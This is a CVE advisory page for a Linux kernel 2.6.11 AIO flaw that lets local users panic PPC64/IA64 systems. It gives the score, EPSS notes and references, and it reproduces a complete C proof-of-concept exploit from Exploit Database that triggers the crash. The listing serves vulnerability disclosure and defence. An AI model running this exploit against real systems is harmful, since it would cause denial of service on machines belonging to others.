Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
AIO in the Linux kernel 2.6.11 on the PPC64 or IA64 architectures with CONFIG_HUGETLB_PAGE enabled allows local users to cause a denial of service (system panic) via a process that executes the io_queue_init function but exits without running io_queue_release, which causes exit_aio and is_hugepage_only_range to fail.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 2.1 | AV:L/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 911
Publication date : 2005-04-03 22h00 +00:00
Author : Daniel McNeil
EDB Verified : Yes
//
// Proof of Concept by Daniel McNeil
// compile using cc -o aiodio_read aiodio_read.c -laio
//
#define _XOPEN_SOURCE 600
#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <libaio.h>
int pagesize;
char *iobuf;
io_context_t myctx;
int aio_maxio = 4;
/*
* do a AIO DIO write
*/
int do_aio_direct_read(int fd, char *iobuf, int offset, int size)
{
struct iocb myiocb;
struct iocb *iocbp = &myiocb;
int ret;
struct io_event e;
struct stat s;
io_prep_pread(&myiocb, fd, iobuf, size, offset);
if ((ret = io_submit(myctx, 1, &iocbp)) != 1) {
perror("io_submit");
return ret;
}
ret = io_getevents(myctx, 1, 1, &e, 0);
if (ret) {
struct iocb *iocb = e.obj;
int iosize = iocb->u.c.nbytes;
char *buf = iocb->u.c.buf;
long long loffset = iocb->u.c.offset;
printf("AIO read of %d at offset %lld returned %d\n",
iosize, loffset, e.res);
}
return ret;
}
int main(int argc, char *argv[])
{
char *filename;
int fd;
int err;
filename = "test.aio.file";
fd = open(filename, O_RDWR|O_DIRECT|O_CREAT|O_TRUNC, 0666);
pagesize = getpagesize();
err = posix_memalign((void**) &iobuf, pagesize, pagesize);
if (err) {
fprintf(stderr, "Error allocating %d aligned bytes.\n",
pagesize);
exit(1);
}
err = write(fd, iobuf, pagesize);
if (err != pagesize) {
fprintf(stderr, "Error ret = %d writing %d bytes.\n",
err, pagesize);
perror("");
exit(1);
}
memset(&myctx, 0, sizeof(myctx));
io_queue_init(aio_maxio, &myctx);
err = do_aio_direct_read(fd, iobuf, 0, pagesize);
close(fd);
printf("This will panic on ppc64\n");
return err;
}
// milw0rm.com [2005-04-04]
Products Mentioned
Configuraton 0
Linux>>Linux_kernel >> Version 2.6.11
- Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.11 (Open CPE detail)
References
http://www.novell.com/linux/security/advisories/2005_50_kernel.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://groups-beta.google.com/group/linux.kernel/browse_thread/thread/13b43bd5783842f6/7ce3c5a514a497ab?q=io_queue_init&rnum=3#7ce3c5a514a497ab
Tags : x_refsource_MISC
Tags : x_refsource_MISC
http://linux.bkbits.net:8080/linux-2.6/cset%404248c8c0es30_4YVdwa6vteKi7h_nw
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
